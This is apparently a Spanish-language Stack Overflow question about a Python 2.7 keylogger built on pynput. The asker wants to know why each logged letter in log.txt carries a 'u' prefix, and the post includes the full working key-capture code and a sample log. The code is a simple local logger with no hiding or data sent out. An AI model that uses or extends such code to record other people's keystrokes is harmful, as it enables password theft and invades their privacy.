# Letra u delante de cada letra tipeada en keylogger python

Tags: python, unicode, logger

Hola estoy teniendo un problema con un keylogger. Lo que pasa es que en el archivo log.txt en el que devuelve lo que se ha escrito, delante de cada letra escrita hay una letra "u". Vi que es algo del formato unicode pero no se como quitarlo en el codigo. Estoy usando python 2.7

Aquí les dejo el codigo y el archivo log.txt

```
import pynput
from pynput.keyboard import Key, Listener


count = 0
keys = []

def on_press(key):
    global keys, count

    keys.append(key)
    count += 1
    print("{} pressed".format(key))

    if count >= 1:
        count = 0
        write_file(keys)
        keys = []

def write_file(keys):
    with open("log.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)
        
    
def on_release(key):
    if key==Key.esc:
       return False


with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Si escribo "Hola stack overflow" el archivo log.txt contiene esto:

```
uhuoulua
usutuaucuk
uouvueurufuluouw
```

Muchas gracias de antemano y espero que me puedan ayudar.